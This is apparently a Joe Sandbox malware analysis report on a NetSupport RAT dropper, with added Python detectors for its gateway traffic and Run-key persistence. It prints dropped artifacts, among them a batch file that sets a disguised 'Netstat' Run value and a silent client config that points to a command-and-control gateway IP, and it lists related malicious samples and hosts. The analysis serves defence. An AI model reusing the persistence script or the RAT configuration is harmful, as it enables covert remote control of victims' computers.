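KNOWN_GATEWAY_IPS = {"45.61.128.74"}
GEO_CHECK_HOST = "geo.netsupportsoftware.com"
GEO_CHECK_PATH = "/location/loca.asp"
GATEWAY_PATHS = {"/fakeurl.htm", "/testpage.htm"}

# Constructed proxy log, one request per line: "<epoch> <client> <method> <url> <status>".
SAMPLE_LOG = """\
1731757265.101 10.0.0.15 POST http://45.61.128.74/fakeurl.htm 200
1731757266.204 10.0.0.15 GET http://geo.netsupportsoftware.com/location/loca.asp 200
1731757270.330 10.0.0.22 GET http://www.example.com/index.htm 200
1731757280.512 10.0.0.15 POST http://203.0.113.9/fakeurl.htm 200
1731757290.777 10.0.0.30 GET http://203.0.113.9/images/testpage.htm 404
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>\S+)\s+(?P<url>\S+)\s+(?P<status>\d+)$"
)


def _is_bare_ip(host: str) -> bool:
    """True when the URL host is a literal IP address rather than a name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def classify(url: str) -> Optional[str]:
    """Return why a request matches, or None.  Checks are ordered from the
    strongest signal (the exact IP from the report) to the weakest (geo check)."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    path = parts.path
    if host in KNOWN_GATEWAY_IPS:
        return "gateway IP listed in report"
    if path in GATEWAY_PATHS and _is_bare_ip(host):
        # Exact path match only: "/images/testpage.htm" on a web server is not this pattern.
        return "NetSupport gateway URL pattern on a bare IP"
    if host == GEO_CHECK_HOST and path == GEO_CHECK_PATH:
        return "NetSupport geo-location check (client present, not proof of abuse)"
    return None


def scan_log(text: str) -> List[Dict[str, str]]:
    """Parse each line and keep the ones classify() flags."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed lines instead of failing the whole scan
        reason = classify(m.group("url"))
        if reason:
            hits.append({"client": m.group("client"), "url": m.group("url"), "reason": reason})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'{hit["client"]}  {hit["url"]}  <- {hit["reason"]}')
```

Against the constructed log this flags three of the five requests, all from 10.0.0.15: the exact gateway IP, the geo check, and a /fakeurl.htm POST to a different bare IP that the pattern rule catches even though that IP is not in the report. The 404 for /images/testpage.htm is deliberately left alone, since the NetSupport gateway strings place the file at the root.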
                                                              Joe Sandbox version:41.0.0 Charoite
                                                              Analysis ID:1556890
                                                              Start date and time:2024-11-16 12:40:06 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 10m 54s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:10
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Sample name:file.exe
                                                              Detection:MAL
                                                              Classification:mal88.rans.evad.winEXE@11/13@1/2
                                                              EGA Information:
                                                              • Successful, ratio: 100%
                                                              HCA Information:
                                                              • Successful, ratio: 79%
                                                              • Number of executed functions: 187
                                                              • Number of non-executed functions: 186
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe
                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
Timeline
Time | Type | Description
06:41:34 | API Interceptor | 17730310x Sleep call for process: bild.exe modified
11:41:05 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Netstat C:\Users\Public\Public\Videos\Video\bild.exe
11:41:13 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Netstat C:\Users\Public\Public\Videos\Video\bild.exe
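Both Autostart entries persist the dropped client through an HKCU Run value named "Netstat" whose image sits under C:\Users\Public, a folder every local user can write to; the value name borrows a well-known tool name while the image is bild.exe. The Python below is an added example and not Joe Sandbox output: it applies that condition to a constructed set of Run values, two of which mirror the entries above and two of which are benign controls. The record layout, the control entries, the environment-variable map and the list of user-writable folders are assumptions made for the demonstration.

```python
"""Added example (not Joe Sandbox output): flag Run-key persistence whose image
lives in a user-writable folder, the condition behind the report's two
Autostart entries.  Record layout, benign control entries, the env-var map and
the folder list are assumptions made for the demonstration."""
from typing import List, NamedTuple, Optional


class RunValue(NamedTuple):
    hive: str   # "HKCU", "HKCU64", "HKLM", as the report names them
    key: str
    name: str
    data: str   # raw value data: image path plus optional arguments


# Constructed records: the two entries from the report plus two benign controls.
SAMPLE_RUN_VALUES = [
    RunValue("HKCU", r"Software\Microsoft\Windows\CurrentVersion\Run", "Netstat",
             r"C:\Users\Public\Public\Videos\Video\bild.exe"),
    RunValue("HKCU64", r"Software\Microsoft\Windows\CurrentVersion\Run", "Netstat",
             r"C:\Users\Public\Public\Videos\Video\bild.exe"),
    RunValue("HKCU", r"Software\Microsoft\Windows\CurrentVersion\Run", "OneDrive",
             r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    RunValue("HKLM", r"Software\Microsoft\Windows\CurrentVersion\Run", "SecurityHealth",
             r"%windir%\system32\SecurityHealthSystray.exe"),
]

# Locations any local user can write to (assumed list; extend per environment).
USER_WRITABLE_PREFIXES = ("c:\\users\\public\\", "c:\\programdata\\", "c:\\windows\\temp\\")
USER_WRITABLE_FRAGMENTS = ("\\appdata\\local\\temp\\",)

# Minimal variable expansion for the sample data; on a live host use os.path.expandvars.
ENV = {"%windir%": "c:\\windows", "%systemroot%": "c:\\windows"}


def image_path(data: str) -> str:
    """Pull the executable path out of Run value data (quoted or bare, with arguments)."""
    data = data.strip()
    if data.startswith('"'):
        end = data.find('"', 1)
        return data[1:end] if end > 0 else data[1:]
    idx = data.lower().find(".exe")
    return data[: idx + 4] if idx != -1 else data.split(" ", 1)[0]


def normalise(path: str) -> str:
    """Lower-case and expand the variables we know about so prefixes compare cleanly."""
    low = path.lower()
    for var, val in ENV.items():
        low = low.replace(var, val)
    return low


def assess(rv: RunValue) -> Optional[str]:
    """Reason string when the Run value launches from a user-writable location, else None."""
    img = normalise(image_path(rv.data))
    writable = img.startswith(USER_WRITABLE_PREFIXES) or any(f in img for f in USER_WRITABLE_FRAGMENTS)
    if not writable:
        return None
    return f"{rv.hive}\\{rv.key}\\{rv.name} -> {img} (user-writable location)"


def find_suspicious(values: List[RunValue]) -> List[str]:
    return [r for r in (assess(v) for v in values) if r]


if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE_RUN_VALUES):
        print(finding)
```

On a live host the same records come from enumerating the Run keys under HKCU and HKLM (for example with PowerShell's Get-ItemProperty) or from registry-set events in Sysmon or EDR telemetry. The HKCU64 entry in the report is the 64-bit view of the same key, so a check keyed on the path and image catches both entries without special handling.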
Joe Sandbox View: context for IP 104.26.0.231
Associated Sample Name / URL | Detection | Threat Name | Context
KC0uZWwr8p.exe | malicious | NetSupport RAT, NetSupport Downloader | geo.netsupportsoftware.com/location/loca.asp
KC0uZWwr8p.exe | malicious | NetSupport RAT, NetSupport Downloader | geo.netsupportsoftware.com/location/loca.asp
hkpqXovZtS.exe | malicious | NetSupport RAT | geo.netsupportsoftware.com/location/loca.asp
file.exe | malicious | NetSupport RAT | geo.netsupportsoftware.com/location/loca.asp
qvoLvRpRbr.msi | malicious | NetSupport RAT | geo.netsupportsoftware.com/location/loca.asp
EMX97rT0GX.msi | malicious | NetSupport RAT | geo.netsupportsoftware.com/location/loca.asp
Support_auto.msi | malicious | NetSupport RAT | geo.netsupportsoftware.com/location/loca.asp
SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | malicious | NetSupport RAT | geo.netsupportsoftware.com/location/loca.asp
SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | malicious | NetSupport RAT | geo.netsupportsoftware.com/location/loca.asp
information_package.exe | malicious | NetSupport RAT, NetSupport Downloader, Stealc, Vidar | geo.netsupportsoftware.com/location/loca.asp

Joe Sandbox View: context for domain geo.netsupportsoftware.com
Associated Sample Name / URL | Detection | Threat Name | Context (IP)
KC0uZWwr8p.exe | malicious | NetSupport RAT, NetSupport Downloader | 104.26.0.231
KC0uZWwr8p.exe | malicious | NetSupport RAT, NetSupport Downloader | 104.26.0.231
72BF1aHUKl.msi | malicious | NetSupport RAT | 172.67.68.212
hkpqXovZtS.exe | malicious | NetSupport RAT | 104.26.0.231
file.exe | malicious | NetSupport RAT | 104.26.1.231
file.exe | malicious | NetSupport RAT | 104.26.1.231
CiscoSetup.exe | malicious | NetSupport RAT, NetSupport Downloader | 172.67.68.212
CiscoSetup.exe | malicious | NetSupport RAT, NetSupport Downloader | 172.67.68.212
CiscoSetup.exe | malicious | NetSupport RAT, NetSupport Downloader | 172.67.68.212
CiscoSetup.exe | malicious | NetSupport RAT, NetSupport Downloader | 104.26.1.231

Joe Sandbox View: context for ASN M247GB
Associated Sample Name / URL | Detection | Threat Name | Context (IP)
yhYrGCKq9s.exe | malicious | RedLine | 91.202.233.18
meerkat.arm.elf | malicious | Mirai | 38.201.237.116
botnet.x86.elf | malicious | Mirai, Moobot | 38.207.55.160
mips.elf | malicious | Unknown | 213.182.204.57
arm7.elf | malicious | Unknown | 213.182.204.57
bin.sh.elf | malicious | Mirai | 45.88.100.118
sora.mpsl.elf | malicious | Mirai | 38.206.146.185
botnet.sh4.elf | malicious | Mirai, Moobot | 173.211.86.154
qy8i3kM2Ir.exe | malicious | GuLoader, Remcos | 172.111.244.104
Xyq6rvzLJs.exe | malicious | SilverRat | 141.98.102.187

Joe Sandbox View: context for ASN CLOUDFLARENETUS
Associated Sample Name / URL | Detection | Threat Name | Context (IP)
file.exe | malicious | LummaC | 172.67.174.133
file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 172.67.174.133
file.exe | malicious | LummaC | 104.21.80.55
rSWIFT.exe | malicious | Snake Keylogger | 188.114.96.3
file.exe | malicious | LummaC | 172.67.174.133
file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 172.64.41.3
https://www.google.com/url?sa=https://r20.rs6.net/tnt.jsp?f=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjU1vfA9siJAxVNh_0HHcggMUkQFnoECB0QAQ&url=amp/s/safetyworksolutions.com%2Fkese%2F7980321465/eW9vbmp1LmNob0Bib2xsb3JlLmNvbQ== | malicious | HTMLPhisher | 104.18.11.207
file.exe | malicious | LummaC | 172.67.174.133
TKnBbCiX07.exe | malicious | GuLoader | 172.67.208.107
file.exe | malicious | LummaC | 172.67.174.133

No context

Joe Sandbox View: context for dropped file C:\Users\Public\Public\Videos\Video\HTCTL32.DLL
Associated Sample Name / URL | Detection | Threat Name
KC0uZWwr8p.exe | malicious | NetSupport RAT, NetSupport Downloader
KC0uZWwr8p.exe | malicious | NetSupport RAT, NetSupport Downloader
file.exe | malicious | NetSupport RAT
file.exe | malicious | NetSupport RAT
CiscoSetup.exe | malicious | NetSupport RAT, NetSupport Downloader
CiscoSetup.exe | malicious | NetSupport RAT, NetSupport Downloader
CiscoSetup.exe | malicious | NetSupport RAT, NetSupport Downloader
CiscoSetup.exe | malicious | NetSupport RAT, NetSupport Downloader
Advanced_IP_Scanner_2.5.4594.12.exe | malicious | NetSupport RAT, NetSupport Downloader
Advanced_IP_Scanner_2.5.4594.12.exe | malicious | NetSupport RAT, NetSupport Downloader
                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):328056
                                                                                  Entropy (8bit):6.754723001562745
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:2ib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OK/Y:2ib5YbsXioEgULFpSzya9/lY5SilQCfg
                                                                                  MD5:2D3B207C8A48148296156E5725426C7F
                                                                                  SHA1:AD464EB7CF5C19C8A443AB5B590440B32DBC618F
                                                                                  SHA-256:EDFE2B923BFB5D1088DE1611401F5C35ECE91581E71503A5631647AC51F7D796
                                                                                  SHA-512:55C791705993B83C9B26A8DBD545D7E149C42EE358ECECE638128EE271E85B4FDBFD6FBAE61D13533BF39AE752144E2CC2C5EDCDA955F18C37A785084DB0860C
                                                                                  Malicious:false
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Public\Videos\Video\HTCTL32.DLL, Author: Joe Security
Antivirus:
• Antivirus: ReversingLabs, Detection: 3%
• Antivirus: Virustotal, Detection: 3%
Joe Sandbox View:
• Filename: KC0uZWwr8p.exe, Detection: malicious
• Filename: KC0uZWwr8p.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: CiscoSetup.exe, Detection: malicious
• Filename: CiscoSetup.exe, Detection: malicious
• Filename: CiscoSetup.exe, Detection: malicious
• Filename: CiscoSetup.exe, Detection: malicious
• Filename: Advanced_IP_Scanner_2.5.4594.12.exe, Detection: malicious
• Filename: Advanced_IP_Scanner_2.5.4594.12.exe, Detection: malicious
                                                                                  Reputation:moderate, very likely benign file
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......=G....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):257
                                                                                  Entropy (8bit):5.119720931145611
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:O/oPn4xRPjwx1lDKHMoEEjLgpW2MezvLdNWYpPM/ioVLa8l6i7s:XeR7wx6JjjqW2MePBPM/ioU8l6J
                                                                                  MD5:7067AF414215EE4C50BFCD3EA43C84F0
                                                                                  SHA1:C331D410672477844A4CA87F43A14E643C863AF9
                                                                                  SHA-256:2050CC232710A2EA6A207BC78D1EAC66A4042F2EE701CDFEEE5DE3DDCDC31D12
                                                                                  SHA-512:17B888087192BCEA9F56128D0950423B1807E294D1C4F953D1BF0F5BD08E5F8E35AFEEE584EBF9233BFC44E0723DB3661911415798159AC118C8A42AAF0B902F
                                                                                  Malicious:false
                                                                                  Reputation:moderate, very likely benign file
                                                                                  Preview:1200..0x3bcb348e....; NetSupport License File...; Generated on 11:54 - 21/03/2018........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=EVALUSION..maxslaves=5000..os2=1..product=10..serial_no=NSM165348..shrink_wrap=0..transport=0..
                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):18808
                                                                                  Entropy (8bit):6.22028391196942
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:1ANeiOT8Z2b6SoVF6RRHaPrpF3o47jtd3hfwHjvud3hfwx7bjuh:1ANt+E2exrpxTSDuTuih
                                                                                  MD5:A0B9388C5F18E27266A31F8C5765B263
                                                                                  SHA1:906F7E94F841D464D4DA144F7C858FA2160E36DB
                                                                                  SHA-256:313117E723DDA6EA3911FAACD23F4405003FB651C73DE8DEFF10B9EB5B4A058A
                                                                                  SHA-512:6051A0B22AF135B4433474DC7C6F53FB1C06844D0A30ED596A3C6C80644DF511B023E140C4878867FA2578C79695FAC2EB303AEA87C0ECFC15A4AD264BD0B3CD
                                                                                  Malicious:false
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Public\Videos\Video\PCICHEK.DLL, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                  • Antivirus: Virustotal, Detection: 1%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......sv..7.d.7.d.7.d.,...5.d.,...4.d.>o..0.d.7.e...d.,...3.d.,...6.d.,...6.d.,...6.d.Rich7.d.........PE..L...f..U...........!......................... ...............................`............@.........................p"..a.... ..P....@............... ..x)...P......@ ............................................... ..@............................text...$........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):3735416
                                                                                  Entropy (8bit):6.525042992590476
                                                                                  Encrypted:false
                                                                                  SSDEEP:49152:cTXNZ+0ci2aYNT8wstdAukudJ1xTvIZamclSp+73mPu:cTXNo0cpKwstTJIkS43mm
                                                                                  MD5:00587238D16012152C2E951A087F2CC9
                                                                                  SHA1:C4E27A43075CE993FF6BB033360AF386B2FC58FF
                                                                                  SHA-256:63AA18C32AF7144156E7EE2D5BA0FA4F5872A7DEB56894F6F96505CBC9AFE6F8
                                                                                  SHA-512:637950A1F78D3F3D02C30A49A16E91CF3DFCCC59104041876789BD7FDF9224D187209547766B91404C67319E13D1606DA7CEC397315495962CBF3E2CCD5F1226
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\Public\Public\Videos\Video\PCICL32.DLL, Author: Joe Security
                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Public\Videos\Video\PCICL32.DLL, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                                                  • Antivirus: Virustotal, Detection: 17%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........(.t.I.'.I.'.I.'A..'.I.'...'.I.'.?#'.I.'...'.I.'.1.'.I.'.I.'.J.'.1.'.I.'.1.'.I.'..#',I.'.."'.I.'...'.I.'...'.I.'...'.I.'Rich.I.'................PE..L......V...........!......... ..............0................................9.....f-9.....................................4........`................8.x)...P7.p....@.......................P.......P..@............0..........`....................text............................... ..`.rdata.......0......................@..@.data....%..........................@....tls.........@......................@....hhshare.....P......................@....rsrc........`......................@..@.reloc..(2...P7..4....6.............@..B........................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):396664
                                                                                  Entropy (8bit):6.809064783360712
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:OpwbUb48Ju0LIFZB4Qaza4yFaMHAZtJ4Yew2j/bJa+neNQ:epq7BaGIn4BbLneNQ
                                                                                  MD5:EAB603D12705752E3D268D86DFF74ED4
                                                                                  SHA1:01873977C871D3346D795CF7E3888685DE9F0B16
                                                                                  SHA-256:6795D760CE7A955DF6C2F5A062E296128EFDB8C908908EDA4D666926980447EA
                                                                                  SHA-512:77DE0D9C93CCBA967DB70B280A85A770B3D8BEA3B707B1ABB037B2826B48898FEC87924E1A6CCE218C43478E5209E9EB9781051B4C3B450BEA3CD27DBD32C7F3
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Public\Videos\Video\TCCTL32.DLL, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                  • Antivirus: Virustotal, Detection: 3%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z..z..z.....z.....z.....z..{.Y.z....K.z......z.....z......z.....z.Rich.z.........PE..L...Y?XV...........!................................................................'.....@.............................o...T...x....0..@...............x)...@..\E..................................`d..@...............h............................text............................... ..`.rdata../...........................@..@.data...h............|..............@....rsrc...@....0......................@..@.reloc.. F...@...H..................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):105848
                                                                                  Entropy (8bit):4.68250265552195
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:qTjV5+6j6Qa86Fkv2Wr120hZIqeTSGRp2TkFimMP:qHVZl6FhWr80/heT8TkFiH
                                                                                  MD5:8D9709FF7D9C83BD376E01912C734F0A
                                                                                  SHA1:E3C92713CE1D7EAA5E2B1FABEB06CDC0BB499294
                                                                                  SHA-256:49A568F8AC11173E3A0D76CFF6BC1D4B9BDF2C35C6D8570177422F142DCFDBE3
                                                                                  SHA-512:042AD89ED2E15671F5DF67766D11E1FA7ADA8241D4513E7C8F0D77B983505D63EBFB39FEFA590A2712B77D7024C04445390A8BF4999648F83DBAB6B0F04EB2EE
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Public\Videos\Video\bild.exe, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 29%
                                                                                  • Antivirus: Virustotal, Detection: 49%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............i...i...i.......i..6....i...h...i..6...i..6..i..6....i.Rich..i.........................PE..L...T..U.....................n...... ........ ....@..................................K....@.................................< ..<....0...i...........t..x).......... ............................................... ...............................text............................... ..`.rdata..V.... ......................@..@.rsrc....i...0...j..................@..@.reloc..l............r..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):700
                                                                                  Entropy (8bit):5.533099732210104
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:Wrqzd+mPZGS/py6z8BlsVTXuZ7+DP981E7GXXfDWQClnmSuZIAlkz6:mqzEmPZly6YBlLoG1fXXfDioIAaz6
                                                                                  MD5:5778ABD7CF2E8039239CD5982281D61A
                                                                                  SHA1:9AA6E80A115343A100031C9473FC6A071EEFD07E
                                                                                  SHA-256:0BD4DC8B66C588F715B117021EF14C959E396F5CC6041F885F0D121401BC267A
                                                                                  SHA-512:DC01567D881D48554732747A286AC9A95EF095B4CB860F384B85636B160778C9EFE366F53550B74D9DDF504B293F03BBB252E5247F03490E4567AD142DEF6E0A
                                                                                  Malicious:false
                                                                                  Preview:0x289612fe....[Client].._present=1..DisableChatMenu=1..DisableClientConnect=1..DisableDisconnect=1..DisableLocalInventory=1..DisableReplayMenu=1..DisableRequestHelp=1..HideWhenIdle=1..Protocols=3..RADIUSSecret=dgAAAOeJWid73S6SvOyjjiTDVewA..RoomSpec=Eval..ShowUIOnConnect=0..silent=1..SKMode=1..SOS_Alt=0..SOS_LShift=0..SOS_RShift=0..SysTray=0..UnloadMirrorOnDisconnect=1..Usernames=*....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0......[HTTP]..GatewayAddress=45.61.128.74:443..gsk=EFHH;K>OBDEJ9A<I@BCB..gskmode=0..gsku=EFHH;K>OBDEJ9A<I@BCB..GSKX=EFHH;K>OBDEJ9A<I@BCB....
                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):773968
                                                                                  Entropy (8bit):6.901559811406837
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                                                                  MD5:0E37FBFA79D349D672456923EC5FBBE3
                                                                                  SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                                                                  SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                                                                  SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):311
                                                                                  Entropy (8bit):5.308980069606459
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:hwszH1j0KpIAgidquHLNQ+bsWWNQ+bd83OG52LvVJ:HVj0Kprgidqunr2SP2hJ
                                                                                  MD5:4DB329A7BA03593C3D02C5E80068F82A
                                                                                  SHA1:70B77611F440DAC81778F54A316E811F3B3C63A4
                                                                                  SHA-256:7182655A9F8489E5B761C16192F3DE1662114F7AA9938F87E0062F8859DAE7F5
                                                                                  SHA-512:6B34FC8000A457F44BEFB03A8153D7E77CA0B8F44705AB7DF2FED3F52599A9172E9A866938986A36B4376C99260B5D03B5496DD605DBFBBD7BF301FE72D31F83
                                                                                  Malicious:true
                                                                                  Preview:@echo off..REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "%Public%\Public\Videos\Video\bild.exe"..start %Public%\Public\Videos\Video\bild.exe..[HKEY_CURRENT_USER\Software\Supservice.."Supservice"="C:\\Program Files (x86)\\Supservice\\supservice.exe".."Version"="5"]..
                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                  File Type:Windows setup INFormation
                                                                                  Category:dropped
                                                                                  Size (bytes):328
                                                                                  Entropy (8bit):4.93007757242403
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
                                                                                  MD5:26E28C01461F7E65C402BDF09923D435
                                                                                  SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                                                                                  SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                                                                                  SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                                                                                  Malicious:false
                                                                                  Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......
                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):33144
                                                                                  Entropy (8bit):6.737780491933496
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:FFvNhAyi5hHA448qZkSn+EgT8To1iTYiu:FCyoHA448qSSzgI2GQ
                                                                                  MD5:DCDE2248D19C778A41AA165866DD52D0
                                                                                  SHA1:7EC84BE84FE23F0B0093B647538737E1F19EBB03
                                                                                  SHA-256:9074FD40EA6A0CAA892E6361A6A4E834C2E51E6E98D1FFCDA7A9A537594A6917
                                                                                  SHA-512:C5D170D420F1AEB9BCD606A282AF6E8DA04AE45C83D07FAAACB73FF2E27F4188B09446CE508620124F6D9B447A40A23620CFB39B79F02B04BB9E513866352166
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Public\Videos\Video\pcicapi.dll, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 3%
